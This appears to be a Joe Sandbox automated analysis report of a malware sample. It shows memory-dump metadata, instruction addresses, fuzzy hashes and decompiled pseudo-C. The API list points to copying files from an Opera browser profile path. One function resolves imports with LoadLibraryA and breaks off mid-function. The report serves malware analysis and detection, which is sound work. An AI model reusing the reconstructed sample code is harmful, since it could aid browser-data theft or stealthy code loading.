                                                                                0x0040d972
                                                                                0x0040d97e
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d980
                                                                                0x0040d986
                                                                                0x0040d98b
                                                                                0x0040d98c
                                                                                0x0040d99b
                                                                                0x0040d99f
                                                                                0x0040d9a4
                                                                                0x0040d9a7
                                                                                0x0040d9ab
                                                                                0x0040d9ad
                                                                                0x0040d9ad
                                                                                0x0040d9b1
                                                                                0x0040d9bc
                                                                                0x0040d9c6
                                                                                0x0040d9ca
                                                                                0x0040d9d9
                                                                                0x0040d9e9
                                                                                0x0040d9ed
                                                                                0x0040d9f8
                                                                                0x0040d9fc
                                                                                0x0040da05
                                                                                0x0040da0b
                                                                                0x0040da0f
                                                                                0x0040da1a
                                                                                0x0040da1e
                                                                                0x0040da2f
                                                                                0x0040da39
                                                                                0x0040da45
                                                                                0x0040da4e
                                                                                0x0040da57
                                                                                0x0040da5e
                                                                                0x0040da62
                                                                                0x0040da66
                                                                                0x0040da78
                                                                                0x0040da7c
                                                                                0x0040da85
                                                                                0x0040da89
                                                                                0x0040da92
                                                                                0x0040da94
                                                                                0x0040da94
                                                                                0x0040da9a
                                                                                0x0040da9c
                                                                                0x0040da9c
                                                                                0x0040daa1
                                                                                0x0040daa8
                                                                                0x0040daad
                                                                                0x0040dab9
                                                                                0x0040dac6
                                                                                0x0040dad3
                                                                                0x0040dadf
                                                                                0x0040daeb
                                                                                0x0040daf7
                                                                                0x0040db03
                                                                                0x0040db0f
                                                                                0x0040db1b
                                                                                0x0040db28
                                                                                0x0040db31
                                                                                0x0040db35
                                                                                0x0040db3a
                                                                                0x0040db47
                                                                                0x0040db49
                                                                                0x0040d823
                                                                                0x0040db55
                                                                                0x0040db5d
                                                                                0x0040db65
                                                                                0x0040db6a
                                                                                0x0040db70
                                                                                0x0040db75
                                                                                0x0040db7b
                                                                                0x0040db81
                                                                                0x0040db87
                                                                                0x0040db8d
                                                                                0x0040db97
                                                                                0x0040dba1
                                                                                0x0040dbab
                                                                                0x0040dbb7

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040D76C
                                                                                • __wgetenv.LIBCMT ref: 0040D7A3
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,\Opera Software\,?,00000000), ref: 004175EF
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414013), ref: 0041761E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D91F
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000001,00000000,?,?,?,?,00000000), ref: 0040D9B1
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000001,00000000,00000001,00000000,?,?,?,?,00000000), ref: 0040DAA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWide$AttributesCopyCreateDirectoryH_prolog3___wgetenv
                                                                                • String ID:
                                                                                • API String ID: 2407594625-0
                                                                                • Opcode ID: 710e04b7528abd2d55df9c60ba74e900898103ac92fb7dd225bbdc96110562f3
                                                                                • Instruction ID: 4745099863267b5fc23faa9ac42b4c35ddfa69ba583e7bcb1b132b18a76a5a50
                                                                                • Opcode Fuzzy Hash: 710e04b7528abd2d55df9c60ba74e900898103ac92fb7dd225bbdc96110562f3
                                                                                • Instruction Fuzzy Hash: 1CD17272C0525C9BCB25EBA9CD45ADEBBB8AF15308F1044EFE40973181DA785B48CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 432fdcbd26440fa49d8c2f0321fafb819c2af6934c27eb33582434f78dbb0314
                                                                                • Instruction ID: d10bbab52d5977bf36daf602d55a69bd52c19fad85295bf8e5a6530a426baa24
                                                                                • Opcode Fuzzy Hash: 432fdcbd26440fa49d8c2f0321fafb819c2af6934c27eb33582434f78dbb0314
                                                                                • Instruction Fuzzy Hash: C9B180B5E00109DFCB08DFACD8919EEB7B5BB88314F24C659E929A7355D730A905CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E0042040D(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                				signed int _v8;
                                                                                				char* _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t82;
                                                                                				char _t89;
                                                                                				signed int _t96;
                                                                                				signed int _t98;
                                                                                				signed int _t101;
                                                                                				signed int _t104;
                                                                                				signed int _t108;
                                                                                				signed int _t109;
                                                                                				char* _t110;
                                                                                				signed int _t120;
                                                                                				signed int _t123;
                                                                                				signed int _t124;
                                                                                				signed int _t125;
                                                                                				signed int _t126;
                                                                                				void* _t127;
                                                                                
                                                                                				_t110 = _a4;
                                                                                				_t108 = _a8;
                                                                                				_t123 = _a12;
                                                                                				_v12 = _t110;
                                                                                				_v8 = _t108;
                                                                                				if(_t123 == 0 || _a16 == 0) {
                                                                                					L5:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t131 = _t110;
                                                                                					if(_t110 != 0) {
                                                                                						_t126 = _a20;
                                                                                						__eflags = _t126;
                                                                                						if(_t126 == 0) {
                                                                                							L9:
                                                                                							__eflags = _t108 - 0xffffffff;
                                                                                							if(_t108 != 0xffffffff) {
                                                                                								_t82 = E00427E30(_t110, 0, _t108);
                                                                                								_t127 = _t127 + 0xc;
                                                                                							}
                                                                                							__eflags = _t126;
                                                                                							if(__eflags == 0) {
                                                                                								goto L3;
                                                                                							} else {
                                                                                								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                                                                								if(__eflags > 0) {
                                                                                									goto L3;
                                                                                								}
                                                                                								L13:
                                                                                								_t124 = _t123 * _a16;
                                                                                								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                								_v20 = _t124;
                                                                                								_t109 = _t124;
                                                                                								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                									_v16 = 0x1000;
                                                                                								} else {
                                                                                									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                								}
                                                                                								__eflags = _t124;
                                                                                								if(_t124 == 0) {
                                                                                									L40:
                                                                                									return _a16;
                                                                                								} else {
                                                                                									do {
                                                                                										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                											L24:
                                                                                											__eflags = _t109 - _v16;
                                                                                											if(_t109 < _v16) {
                                                                                												_t89 = E00429FED(_t109, _t124, _t126);
                                                                                												__eflags = _t89 - 0xffffffff;
                                                                                												if(_t89 == 0xffffffff) {
                                                                                													L45:
                                                                                													return (_t124 - _t109) / _a12;
                                                                                												}
                                                                                												__eflags = _v8;
                                                                                												if(_v8 == 0) {
                                                                                													L41:
                                                                                													__eflags = _a8 - 0xffffffff;
                                                                                													if(__eflags != 0) {
                                                                                														E00427E30(_a4, 0, _a8);
                                                                                													}
                                                                                													 *((intOrPtr*)(E00423E5B(__eflags))) = 0x22;
                                                                                													L4:
                                                                                													E00424EDB();
                                                                                													goto L5;
                                                                                												}
                                                                                												_v12 = _v12 + 1;
                                                                                												 *_v12 = _t89;
                                                                                												_t109 = _t109 - 1;
                                                                                												_t65 =  &_v8;
                                                                                												 *_t65 = _v8 - 1;
                                                                                												__eflags =  *_t65;
                                                                                												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                												goto L39;
                                                                                											}
                                                                                											__eflags = _v16;
                                                                                											if(_v16 == 0) {
                                                                                												_t96 = 0x7fffffff;
                                                                                												__eflags = _t109 - 0x7fffffff;
                                                                                												if(_t109 <= 0x7fffffff) {
                                                                                													_t96 = _t109;
                                                                                												}
                                                                                											} else {
                                                                                												__eflags = _t109 - 0x7fffffff;
                                                                                												if(_t109 <= 0x7fffffff) {
                                                                                													_t50 = _t109 % _v16;
                                                                                													__eflags = _t50;
                                                                                													_t120 = _t50;
                                                                                													_t101 = _t109;
                                                                                												} else {
                                                                                													_t120 = 0x7fffffff % _v16;
                                                                                													_t101 = 0x7fffffff;
                                                                                												}
                                                                                												_t96 = _t101 - _t120;
                                                                                											}
                                                                                											__eflags = _t96 - _v8;
                                                                                											if(_t96 > _v8) {
                                                                                												goto L41;
                                                                                											} else {
                                                                                												_push(_t96);
                                                                                												_push(_v12);
                                                                                												_push(E00426CDE(_t126));
                                                                                												_t98 = E0042A95D(_t109, _t124, _t126, __eflags);
                                                                                												_t127 = _t127 + 0xc;
                                                                                												__eflags = _t98;
                                                                                												if(_t98 == 0) {
                                                                                													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                                                                													goto L45;
                                                                                												}
                                                                                												__eflags = _t98 - 0xffffffff;
                                                                                												if(_t98 == 0xffffffff) {
                                                                                													L44:
                                                                                													_t72 = _t126 + 0xc;
                                                                                													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                                                                													__eflags =  *_t72;
                                                                                													goto L45;
                                                                                												}
                                                                                												_v12 = _v12 + _t98;
                                                                                												_t109 = _t109 - _t98;
                                                                                												_v8 = _v8 - _t98;
                                                                                												goto L39;
                                                                                											}
                                                                                										}
                                                                                										_t104 =  *(_t126 + 4);
                                                                                										__eflags = _t104;
                                                                                										if(__eflags == 0) {
                                                                                											goto L24;
                                                                                										}
                                                                                										if(__eflags < 0) {
                                                                                											goto L44;
                                                                                										}
                                                                                										_t125 = _t109;
                                                                                										__eflags = _t109 - _t104;
                                                                                										if(_t109 >= _t104) {
                                                                                											_t125 = _t104;
                                                                                										}
                                                                                										__eflags = _t125 - _v8;
                                                                                										if(_t125 > _v8) {
                                                                                											goto L41;
                                                                                										} else {
                                                                                											E00420674(_v12, _v8,  *_t126, _t125);
                                                                                											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                                                                											 *_t126 =  *_t126 + _t125;
                                                                                											_v12 = _v12 + _t125;
                                                                                											_t109 = _t109 - _t125;
                                                                                											_t127 = _t127 + 0x10;
                                                                                											_v8 = _v8 - _t125;
                                                                                											_t124 = _v20;
                                                                                										}
                                                                                										L39:
                                                                                										__eflags = _t109;
                                                                                									} while (_t109 != 0);
                                                                                									goto L40;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t82 = (_t82 | 0xffffffff) / _t123;
                                                                                						__eflags = _a16 - _t82;
                                                                                						if(_a16 <= _t82) {
                                                                                							goto L13;
                                                                                						}
                                                                                						goto L9;
                                                                                					}
                                                                                					L3:
                                                                                					 *((intOrPtr*)(E00423E5B(_t131))) = 0x16;
                                                                                					goto L4;
                                                                                				}
                                                                                			}


























                                                                                0x00420415
                                                                                0x00420419
                                                                                0x0042041e
                                                                                0x00420421
                                                                                0x00420424
                                                                                0x00420429
                                                                                0x00420445
                                                                                0x00000000
                                                                                0x00420431
                                                                                0x00420431
                                                                                0x00420433
                                                                                0x0042044c
                                                                                0x0042044f
                                                                                0x00420451
                                                                                0x0042045f
                                                                                0x0042045f
                                                                                0x00420462
                                                                                0x00420468
                                                                                0x0042046d
                                                                                0x0042046d
                                                                                0x00420470
                                                                                0x00420472
                                                                                0x00000000
                                                                                0x00420474
                                                                                0x0042047b
                                                                                0x0042047e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420480
                                                                                0x00420480
                                                                                0x00420484
                                                                                0x0042048b
                                                                                0x0042048e
                                                                                0x00420490
                                                                                0x0042049a
                                                                                0x00420492
                                                                                0x00420495
                                                                                0x00420495
                                                                                0x004204a1
                                                                                0x004204a3
                                                                                0x00420583
                                                                                0x00000000
                                                                                0x004204a9
                                                                                0x004204a9
                                                                                0x004204a9
                                                                                0x004204b0
                                                                                0x004204f6
                                                                                0x004204f6
                                                                                0x004204f9
                                                                                0x00420558
                                                                                0x0042055e
                                                                                0x00420561
                                                                                0x004205b5
                                                                                0x00000000
                                                                                0x004205bb
                                                                                0x00420563
                                                                                0x00420567
                                                                                0x0042058b
                                                                                0x0042058b
                                                                                0x0042058f
                                                                                0x00420599
                                                                                0x0042059e
                                                                                0x004205a6
                                                                                0x00420440
                                                                                0x00420440
                                                                                0x00000000
                                                                                0x00420440
                                                                                0x0042056c
                                                                                0x0042056f
                                                                                0x00420574
                                                                                0x00420575
                                                                                0x00420575
                                                                                0x00420575
                                                                                0x00420578
                                                                                0x00000000
                                                                                0x00420578
                                                                                0x004204fb
                                                                                0x004204ff
                                                                                0x00420520
                                                                                0x00420525
                                                                                0x00420527
                                                                                0x00420529
                                                                                0x00420529
                                                                                0x00420501
                                                                                0x00420508
                                                                                0x0042050a
                                                                                0x00420517
                                                                                0x00420517
                                                                                0x00420517
                                                                                0x0042051a
                                                                                0x0042050c
                                                                                0x0042050e
                                                                                0x00420511
                                                                                0x00420511
                                                                                0x0042051c
                                                                                0x0042051c
                                                                                0x0042052b
                                                                                0x0042052e
                                                                                0x00000000
                                                                                0x00420530
                                                                                0x00420530
                                                                                0x00420531
                                                                                0x0042053b
                                                                                0x0042053c
                                                                                0x00420541
                                                                                0x00420544
                                                                                0x00420546
                                                                                0x004205c3
                                                                                0x00000000
                                                                                0x004205c3
                                                                                0x00420548
                                                                                0x0042054b
                                                                                0x004205b1
                                                                                0x004205b1
                                                                                0x004205b1
                                                                                0x004205b1
                                                                                0x00000000
                                                                                0x004205b1
                                                                                0x0042054d
                                                                                0x00420550
                                                                                0x00420552
                                                                                0x00000000
                                                                                0x00420552
                                                                                0x0042052e
                                                                                0x004204b2
                                                                                0x004204b5
                                                                                0x004204b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004204b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004204bf
                                                                                0x004204c1
                                                                                0x004204c3
                                                                                0x004204c5
                                                                                0x004204c5
                                                                                0x004204c7
                                                                                0x004204ca
                                                                                0x00000000
                                                                                0x004204d0
                                                                                0x004204d9
                                                                                0x004204de
                                                                                0x004204e1
                                                                                0x004204e3
                                                                                0x004204e6
                                                                                0x004204e8
                                                                                0x004204eb
                                                                                0x004204ee
                                                                                0x004204ee
                                                                                0x0042057b
                                                                                0x0042057b
                                                                                0x0042057b
                                                                                0x00000000
                                                                                0x004204a9
                                                                                0x004204a3
                                                                                0x00420472
                                                                                0x00420458
                                                                                0x0042045a
                                                                                0x0042045d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042045d
                                                                                0x00420435
                                                                                0x0042043a
                                                                                0x00000000
                                                                                0x0042043a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 4048096073-0
                                                                                • Opcode ID: 1aa14f87bd80fa15905a971588af030c7160ad9f87238f269029738f561264b5
                                                                                • Instruction ID: d185e40525eed09795b002153564981a3491385e146d8054c892fe8d75a71f3f
                                                                                • Opcode Fuzzy Hash: 1aa14f87bd80fa15905a971588af030c7160ad9f87238f269029738f561264b5
                                                                                • Instruction Fuzzy Hash: D0510630B00724EFDB20DF69A84465FB7F5AF40324F64866BE82492292D778DE91CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00414818(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
                                                                                				void* _t54;
                                                                                				intOrPtr _t56;
                                                                                				signed int _t59;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t71;
                                                                                				void* _t89;
                                                                                				intOrPtr _t103;
                                                                                				signed int _t106;
                                                                                				intOrPtr _t107;
                                                                                				signed int _t108;
                                                                                				void* _t109;
                                                                                
                                                                                				_t106 = __esi;
                                                                                				_push(0x2c);
                                                                                				E004219DE(E00435F11, __ebx, __edi, __esi);
                                                                                				_t105 = __ecx;
                                                                                				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) == 0) {
                                                                                					L4:
                                                                                					__eflags =  *(_t105 + 0x54);
                                                                                					if( *(_t105 + 0x54) != 0) {
                                                                                						E00414E42(_t105);
                                                                                						__eflags =  *(_t105 + 0x44);
                                                                                						if(__eflags != 0) {
                                                                                							 *((intOrPtr*)(_t109 - 0x18)) = 0xf;
                                                                                							 *((intOrPtr*)(_t109 - 0x1c)) = 0;
                                                                                							 *((char*)(_t109 - 0x2c)) = 0;
                                                                                							 *((intOrPtr*)(_t109 - 4)) = 0;
                                                                                							_push( *(_t105 + 0x54));
                                                                                							_t54 = E0041FFE6(0, _t105, _t106, __eflags);
                                                                                							_t83 = 1;
                                                                                							while(1) {
                                                                                								_pop(_t89);
                                                                                								__eflags = _t54 - 0xffffffff;
                                                                                								if(_t54 == 0xffffffff) {
                                                                                									break;
                                                                                								}
                                                                                								_t107 = _t109 - 0x2c;
                                                                                								E0040D70E(_t83, _t89, _t107, _t109, _t54);
                                                                                								__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                								_t103 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                								_t56 = _t103;
                                                                                								if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                									_t56 = _t107;
                                                                                									_t103 = _t107;
                                                                                								}
                                                                                								_t106 =  *( *(_t105 + 0x44));
                                                                                								_t83 = _t109 - 0x34;
                                                                                								_t59 =  *((intOrPtr*)(_t106 + 0x10))(_t105 + 0x4c, _t103, _t56 +  *((intOrPtr*)(_t109 - 0x1c)), _t109 - 0x34, _t109 - 0x2d, _t109 - 0x2c, _t109 - 0x38);
                                                                                								__eflags = _t59;
                                                                                								if(_t59 < 0) {
                                                                                									break;
                                                                                								} else {
                                                                                									_t83 = 1;
                                                                                									__eflags = _t59 - 1;
                                                                                									if(_t59 <= 1) {
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x38)) - _t109 - 0x2d;
                                                                                										_t64 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                										if( *((intOrPtr*)(_t109 - 0x38)) != _t109 - 0x2d) {
                                                                                											__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                											if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                												_t64 = _t109 - 0x2c;
                                                                                											}
                                                                                											_t108 = _t64 -  *((intOrPtr*)(_t109 - 0x34)) +  *((intOrPtr*)(_t109 - 0x1c));
                                                                                											while(1) {
                                                                                												__eflags = _t108;
                                                                                												if(_t108 <= 0) {
                                                                                													break;
                                                                                												}
                                                                                												_push( *(_t105 + 0x54));
                                                                                												_t108 = _t108 - 1;
                                                                                												__eflags = _t108;
                                                                                												_push( *((char*)(_t108 +  *((intOrPtr*)(_t109 - 0x34)))));
                                                                                												E0041FAA3(_t83, _t105, _t108, _t108);
                                                                                											}
                                                                                											L32:
                                                                                											_t106 =  *(_t109 - 0x2d) & 0x000000ff;
                                                                                											L26:
                                                                                											E00402C34(_t109 - 0x2c, 1, 0);
                                                                                											L3:
                                                                                											return E00421A61(_t83, _t105, _t106);
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                										if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                											_t64 = _t109 - 0x2c;
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t109 - 0x34)) - _t64;
                                                                                										E00403EAE(_t109 - 0x2c, 0,  *((intOrPtr*)(_t109 - 0x34)) - _t64);
                                                                                										L23:
                                                                                										_push( *(_t105 + 0x54));
                                                                                										_t54 = E0041FFE6(_t83, _t105, _t106, __eflags);
                                                                                										continue;
                                                                                									}
                                                                                									__eflags = _t59 - 3;
                                                                                									if(_t59 != 3) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t109 - 0x1c)) - 1;
                                                                                									if(__eflags < 0) {
                                                                                										goto L23;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                                									_t71 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                                										_t71 = _t109 - 0x2c;
                                                                                									}
                                                                                									E00420674(_t109 - 0x2d, _t83, _t71, _t83);
                                                                                									goto L32;
                                                                                								}
                                                                                							}
                                                                                							__eflags = _t106;
                                                                                							goto L26;
                                                                                						}
                                                                                						_push( *(_t105 + 0x54));
                                                                                						_t51 = E0041FFE6(0, _t105, _t106, __eflags);
                                                                                						__eflags = _t51 - 0xffffffff;
                                                                                						if(_t51 == 0xffffffff) {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                					L5:
                                                                                					goto L3;
                                                                                				}
                                                                                				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))))) {
                                                                                					goto L4;
                                                                                				}
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                                                                				_t105 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) + 1;
                                                                                				goto L3;
                                                                                			}














                                                                                0x00414818
                                                                                0x00414818
                                                                                0x0041481f
                                                                                0x00414824
                                                                                0x00414829
                                                                                0x0041482f
                                                                                0x00414859
                                                                                0x00414859
                                                                                0x0041485c
                                                                                0x00414865
                                                                                0x0041486a
                                                                                0x0041486d
                                                                                0x00414882
                                                                                0x00414889
                                                                                0x0041488c
                                                                                0x0041488f
                                                                                0x00414892
                                                                                0x00414895
                                                                                0x0041489c
                                                                                0x00414939
                                                                                0x00414939
                                                                                0x0041493a
                                                                                0x0041493d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004148a3
                                                                                0x004148a6
                                                                                0x004148ab
                                                                                0x004148af
                                                                                0x004148b2
                                                                                0x004148b4
                                                                                0x004148b6
                                                                                0x004148b8
                                                                                0x004148b8
                                                                                0x004148c0
                                                                                0x004148ce
                                                                                0x004148d8
                                                                                0x004148db
                                                                                0x004148dd
                                                                                0x00000000
                                                                                0x004148df
                                                                                0x004148e1
                                                                                0x004148e2
                                                                                0x004148e4
                                                                                0x00414910
                                                                                0x00414913
                                                                                0x00414916
                                                                                0x00414959
                                                                                0x0041495d
                                                                                0x0041495f
                                                                                0x0041495f
                                                                                0x00414968
                                                                                0x0041497f
                                                                                0x0041497f
                                                                                0x00414981
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041496f
                                                                                0x00414972
                                                                                0x00414972
                                                                                0x00414977
                                                                                0x00414978
                                                                                0x0041497e
                                                                                0x00414983
                                                                                0x00414983
                                                                                0x00414946
                                                                                0x0041494d
                                                                                0x00414853
                                                                                0x00414858
                                                                                0x00414858
                                                                                0x00414918
                                                                                0x0041491c
                                                                                0x0041491e
                                                                                0x0041491e
                                                                                0x00414924
                                                                                0x0041492c
                                                                                0x00414931
                                                                                0x00414931
                                                                                0x00414934
                                                                                0x00000000
                                                                                0x00414934
                                                                                0x004148e6
                                                                                0x004148e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004148eb
                                                                                0x004148ee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004148f0
                                                                                0x004148f4
                                                                                0x004148f7
                                                                                0x004148f9
                                                                                0x004148f9
                                                                                0x00414903
                                                                                0x00000000
                                                                                0x00414908
                                                                                0x004148dd
                                                                                0x00414943
                                                                                0x00000000
                                                                                0x00414943
                                                                                0x0041486f
                                                                                0x00414872
                                                                                0x00414878
                                                                                0x0041487b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041487d
                                                                                0x0041485e
                                                                                0x00000000
                                                                                0x0041485e
                                                                                0x00414837
                                                                                0x0041483f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00414844
                                                                                0x00414846
                                                                                0x0041484e
                                                                                0x00000000

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fgetc$H_prolog3_Xinvalid_argument_memcpy_sstd::_
                                                                                • String ID:
                                                                                • API String ID: 2343611727-0
                                                                                • Opcode ID: 9a26f8863223528a8ba9dc4884003ad9a270d8428d444be22dc5fe37b6817259
                                                                                • Instruction ID: ba4459478a599cfadc9b88684c03bf1d21f6774d6f14acb406a39b5e284c0b53
                                                                                • Opcode Fuzzy Hash: 9a26f8863223528a8ba9dc4884003ad9a270d8428d444be22dc5fe37b6817259
                                                                                • Instruction Fuzzy Hash: 1F51A1B5E002199FDB10EFB8C9819EEB7B4FF49314B10452BE121A7291D738A985CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00402EF4(void* __esi) {
                                                                                				signed short* _v8;
                                                                                				struct HINSTANCE__* _v12;
                                                                                				signed short _v16;
                                                                                				void* __edi;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t36;
                                                                                				signed short _t37;
                                                                                				signed short _t38;
                                                                                				intOrPtr _t40;
                                                                                				signed short _t42;
                                                                                				CHAR* _t43;
                                                                                				_Unknown_base(*)()* _t44;
                                                                                				signed int _t45;
                                                                                				signed int _t48;
                                                                                				signed short _t55;
                                                                                				signed short _t60;
                                                                                				void* _t64;
                                                                                				signed short _t67;
                                                                                				signed short _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                
                                                                                				_t70 = __esi;
                                                                                				_t34 =  *((intOrPtr*)(__esi + 0xc0));
                                                                                				_t72 = _t71 - 0xc;
                                                                                				if(_t34 != 0 &&  *((intOrPtr*)(__esi + 0xc4)) != 0) {
                                                                                					_t55 =  *((intOrPtr*)(__esi + 0x144)) + _t34;
                                                                                					while(1) {
                                                                                						_t36 =  *((intOrPtr*)(_t55 + 0xc));
                                                                                						if(_t36 == 0) {
                                                                                							goto L24;
                                                                                						}
                                                                                						_t37 = LoadLibraryA( *((intOrPtr*)(_t70 + 0x144)) + _t36);
                                                                                						_v12 = _t37;
                                                                                						__eflags = _t37;
                                                                                						if(_t37 == 0) {
                                                                                							L26:
                                                                                							_push(6);
                                                                                							goto L27;
                                                                                						} else {
                                                                                							_t38 =  *(_t70 + 0x154);
                                                                                							__eflags =  *(_t70 + 0x150) - _t38;
                                                                                							if( *(_t70 + 0x150) < _t38) {
                                                                                								_t67 = _v16;
                                                                                								goto L13;
                                                                                							} else {
